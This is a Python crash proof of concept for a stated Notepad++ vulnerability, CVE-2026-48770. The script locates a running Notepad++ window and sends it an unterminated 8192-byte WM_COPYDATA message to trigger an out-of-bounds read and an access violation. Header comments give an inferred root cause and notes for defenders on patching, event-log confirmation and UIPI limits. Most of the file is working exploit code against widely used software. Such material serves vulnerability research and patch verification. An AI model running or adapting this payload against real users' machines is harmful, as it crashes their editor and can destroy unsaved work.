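#!/usr/bin/env python3
# CVE-2026-48770 - Notepad++ OOB Read via WM_COPYDATA (crash PoC)
#
# What the script does: it sends one WM_COPYDATA message to a running
# Notepad++ window in the same desktop session. The payload is cbData bytes
# of 0x41 with no NUL byte inside that range.
#
# Root cause (inferred from the CVE title and the payload shape; confirm
# against the vendor advisory): the receiver presumably treats lpData as a
# NUL-terminated string without bounding the read by cbData, so it reads past
# the end of its copy of the payload.
#
# Notes for defenders:
#   * Remediation is a Notepad++ build that fixes CVE-2026-48770. The general
#     fix for this bug class is to bound every read of lpData by cbData, or to
#     reject payloads that have no terminator inside cbData.
#   * An access violation (0xc0000005) in the editor is recorded by Windows
#     Error Reporting and in the Application event log ("Application Error",
#     event ID 1000), which is the reliable confirmation of a crash.
#   * WM_COPYDATA is subject to UIPI, so a sender at lower integrity than the
#     target window cannot deliver it. A blocked send also returns 0.

import ctypes
import ctypes.wintypes
import sys

WM_COPYDATA = 0x004A
SMTO_ABORTIFHUNG = 0x0002


class COPYDATASTRUCT(ctypes.Structure):
    """Mirror of the Win32 COPYDATASTRUCT that WM_COPYDATA passes in lParam."""

    _fields_ = [
        ("dwData", ctypes.wintypes.LPARAM),  # pointer-sized message type tag
        ("cbData", ctypes.wintypes.DWORD),   # byte count the system marshals
        ("lpData", ctypes.c_void_p),         # payload address in the sender
    ]


user32 = ctypes.windll.user32

# Look the main window up by its window class name.
hwnd = user32.FindWindowW("Notepad++", None)
if not hwnd:
    print("[-] Notepad++ not found - open it first")
    sys.exit(1)
print(f"[+] Found Notepad++ HWND: 0x{hwnd:08X}")

cbData = 8192
# create_string_buffer() appends a NUL after the initial bytes, so the local
# buffer is cbData + 1 bytes long. Only cbData bytes are declared below, so
# the copy handed to the receiver holds no terminator.
buf = ctypes.create_string_buffer(b"\x41" * cbData)

cds = COPYDATASTRUCT()
cds.dwData = 3
cds.cbData = cbData
cds.lpData = ctypes.cast(buf, ctypes.c_void_p).value

print(f"[*] Sending malformed WM_COPYDATA (dwData=3, cbData={cbData}, no NUL terminator)...")

# lpdwResult is a PDWORD_PTR, i.e. it points at a pointer-sized integer. A
# 4-byte DWORD here would let the API write 8 bytes into a 4-byte object on
# 64-bit Python, so a pointer-sized integer is used instead.
result = ctypes.c_size_t(0)
ret = user32.SendMessageTimeoutW(
    hwnd,
    WM_COPYDATA,
    0,
    ctypes.byref(cds),
    SMTO_ABORTIFHUNG,
    2000,  # timeout in milliseconds
    ctypes.byref(result),
)

if ret == 0:
    # 0 means the call failed or timed out. A hung but still-running target,
    # or a send blocked by UIPI, also ends up here, so this is an indication
    # only. Confirm a crash from the process state or the Application log.
    print("[+] SendMessageTimeout returned 0 - Notepad++ likely crashed (OOB read -> 0xc0000005)")
else:
    # Non-zero means the target handled the message and returned in time.
    print(f"[-] No crash (ret={ret}) - may be patched")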